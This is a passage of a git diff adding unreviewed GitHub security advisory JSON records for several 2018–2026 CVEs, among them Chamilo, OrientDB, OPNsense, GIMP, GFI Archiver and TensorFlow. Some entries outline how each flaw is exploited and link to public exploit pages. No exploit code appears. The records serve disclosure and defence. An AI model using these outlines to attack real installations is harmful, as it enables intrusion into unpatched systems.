"CVE-2018-25158" + ], + "details": "Chamilo LMS 1.11.8 contains an arbitrary file upload vulnerability that allows authenticated users to upload and execute PHP files through the elfinder filemanager module. Attackers can upload files with image headers in the social myfiles section, rename them to PHP extensions, and execute arbitrary code by accessing the uploaded files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25158" + }, + { + "type": "WEB", + "url": "https://github.com/chamilo/chamilo-lms" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47423" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/chamilo-lms-arbitrary-file-upload-via-elfinder" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json b/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json new file mode 100644 index 0000000000000..227fba5a12b86 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65c4-vf29-7265", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25447" + ], + "details": "OrientDB 3.0.17 GA Community Edition contains cross-site request forgery vulnerabilities that allow attackers to perform unauthorized actions by crafting malicious requests to endpoints like /database/, /command/, and /document/. Attackers can create or delete databases, modify schema classes, manage users, and create functions by sending authenticated requests without token validation, combined with reflected and stored cross-site scripting vulnerabilities in the web interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25447" + }, + { + "type": "WEB", + "url": "https://orientdb.dev" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46517" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/orientdb-cross-site-request-forgery" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json b/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json new file mode 100644 index 0000000000000..42eb7bab1e005 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6q4c-4x29-76qv", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2035" + ], + "details": "Deciso OPNsense diag_backup.php filename Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Deciso OPNsense. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of backup configuration files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-28131.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2035" + }, + { + "type": "WEB", + "url": "https://github.com/opnsense/core/commit/cb15c935137d05c86a1e6cf12af877e9c32a23af" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-078" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json b/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json new file mode 100644 index 0000000000000..1b2d7e9babfcf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7c63-32m9-7mfg", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2026-0797" + ], + "details": "GIMP ICO File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICO files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28599.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0797" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/69cc6b1a6645dc9c4d7b484483dbe6a84b922b9c" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-050" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json b/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json new file mode 100644 index 0000000000000..3add75036fd24 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7h2v-5mq4-f627", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2037" + ], + "details": "GFI Archiver MArc.Core Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the configuration of the MArc.Core.Remoting.exe process, which listens on port 8017. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27935.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2037" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-074" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json b/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json new file mode 100644 index 0000000000000..6cab6c6468868 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j7g-rjc3-pcjw", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25437" + ], + "details": "Foscam Video Management System 1.1.6.6 contains a buffer overflow vulnerability in the UID field that allows local attackers to crash the application by supplying an excessively long string. Attackers can input a 5000-character buffer into the UID parameter during device addition to trigger an application crash when the Login Check function is invoked.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25437" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47478" + }, + { + "type": "WEB", + "url": "https://www.foscam.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/foscam-video-management-system-buffer-overflow-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json b/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json new file mode 100644 index 0000000000000..783b580d1fe3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8pcr-7mgm-xjqp", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25449" + ], + "details": "OrientDB 3.0.17 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted JSON payloads to the document endpoint. Attackers can send POST requests to /document/demodb/-1:-1 with script tags in the name parameter to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25449" + }, + { + "type": "WEB", + "url": "https://orientdb.dev" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46517" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/orientdb-reflected-cross-site-scripting-via-document-endpoint" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json b/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json new file mode 100644 index 0000000000000..166d9914a7dd8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8r4q-6953-w8gp", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2036" + ], + "details": "GFI Archiver MArc.Store Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GFI Archiver. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the configuration of the MArc.Store.Remoting.exe process. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-27936.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2036" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-076" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json b/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json new file mode 100644 index 0000000000000..c7b68d5793e1f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8w2x-hhv3-2m76", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25434" + ], + "details": "SpotAuditor 5.3.1.0 contains a denial of service vulnerability that allows unauthenticated attackers to crash the application by submitting excessive data in the registration name field. Attackers can enter a large string of characters (5000 bytes or more) in the name field during registration to trigger an unhandled exception that crashes the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25434" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47494" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotauditor-denial-of-service-via-registration-name-field" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json b/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json new file mode 100644 index 0000000000000..efea9c10aaf5a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-974r-v62q-8fqc", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2048" + ], + "details": "GIMP XWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of XWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28591.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2048" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2586/diffs?commit_id=57712677007793118388c5be6fb8231f22a2b341" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-121" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json b/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json new file mode 100644 index 0000000000000..9920330388421 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9j8v-79v3-wcmp", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2040" + ], + "details": "PDF-XChange Editor TrackerUpdate Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of PDF-XChange Editor. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the TrackerUpdate process. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of a target user. Was ZDI-CAN-27788.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2040" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-122" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json b/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json new file mode 100644 index 0000000000000..8535f7bb34574 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pq7-r6qx-2rhf", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2044" + ], + "details": "GIMP PGM File Parsing Uninitialized Memory Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PGM files. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28158.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2044" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2569/diffs?commit_id=112a5e038f0646eae5ae314988ec074433d2b365" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-118" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-908" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json b/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json new file mode 100644 index 0000000000000..e5abf24639e31 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xmv-j327-gw5g", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2492" + ], + "details": "TensorFlow HDF5 Library Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of TensorFlow. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the handling of plugins. The application loads plugins from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-25480.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2492" + }, + { + "type": "WEB", + "url": "https://github.com/tensorflow/tensorflow/commit/46e7f7fb144fd11cf6d17c23dd47620328d77082" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-116" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json b/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json new file mode 100644 index 0000000000000..9ef1ff0afc53f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c478-8rj5-w9cv", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25435" + ], + "details": "Sricam DeviceViewer 3.12.0.1 contains a local buffer overflow vulnerability in the user management add user function that allows authenticated attackers to execute arbitrary code by bypassing data execution prevention. Attackers can inject a malicious payload through the Username field in User Management to trigger a stack-based buffer overflow and execute commands via ROP chain gadgets.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25435" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47477" + }, + { + "type": "WEB", + "url": "https://www.sricam.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/sricam-deviceviewer-local-buffer-overflow-dep-bypass" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json b/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json new file mode 100644 index 0000000000000..4aaa80cfdffc8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fhrj-59h8-j7gf", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25451" + ], + "details": "phpMoAdmin 1.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized database operations by crafting malicious requests. Attackers can trick authenticated users into submitting GET requests to moadmin.php with parameters like action, db, and collection to create, drop, or repair databases and collections without user consent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25451" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46082" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phpmoadmin-cross-site-request-forgery-via-moadminphp" + }, + { + "type": "WEB", + "url": "http://www.phpmoadmin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json b/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json new file mode 100644 index 0000000000000..c8abd181e363b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjxv-44q5-26f4", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25448" + ], + "details": "OrientDB 3.0.17 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating users with script payloads in the name parameter. Attackers can send POST requests to the document endpoint with JavaScript code in the name field to execute arbitrary scripts when users view the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25448" + }, + { + "type": "WEB", + "url": "https://orientdb.dev" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46517" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/orientdb-stored-cross-site-scripting-via-user-creation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json 